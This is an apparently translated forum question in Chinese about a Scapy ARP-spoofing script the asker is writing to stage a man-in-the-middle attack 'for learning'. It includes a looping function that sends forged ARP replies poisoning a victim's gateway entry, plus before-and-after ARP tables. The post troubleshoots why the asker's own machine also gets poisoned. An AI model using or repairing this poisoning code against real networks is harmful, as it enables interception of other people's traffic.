我正在尝试使用ARP欺骗来创建MITM攻击,这只是为了学习,而且当我执行脚本时,即使我没有将ARP数据包发送到我的计算机,我的计算机的默认网关也被更改了。
我为修复此问题所做的尝试:
我尝试仅将ARP数据包发送到我的机器,这会将默认网关的IPv6地址更改回原始IPv6地址,但这似乎不起作用。
这是中毒代码:
def poison():
global threadGo
ip_to_infect = sys.argv[1]
ip_to_infect_v6 = sys.argv[2]
default_gateway = sys.argv[3]
my_ip_v6 = Ether().src
poison_packet = ARP(hwsrc=my_ip_v6,hwdst=ip_to_infect_v6, pdst=ip_to_infect,psrc=default_gateway, op=2)
# My attempt at fixing it below this line
my_ip = IP().src
default_gate = "*default_gateway*"
restore_my_self = ARP(psrc=default_gateway, hwsrc=default_gate, hwdst=my_ip_v6, pdst=my_ip)
# My attempt at fixing the problem is above this line
print("[+] Poisoning %s\n" % (ip_to_infect))
while True:
send(restore_my_self, count=1, verbose=False)
send(poison_packet,count=1, verbose=False) # Attempt to fix
这是之前攻击机的arp列表:
Address HWtype HWaddress Flags Mask Iface
10.0.0.138 ether *default_gateway* C wlp3s
及之后:
Address HWtype HWaddress Flags Mask Iface
10.0.0.138 ether *my_ip_v6* C wlp3s
这是我机器之前的arp列表:
Internet Address Physical Address Type
10.0.0.138 *default_gateway* dynamic
及之后:
Internet Address Physical Address Type
10.0.0.138 *my_ip_v6* dynamic
编辑:我只是用wireshark查看发生了什么,并且由于某种原因,我也将ARP数据包发送到了我的机器。这是怎么回事?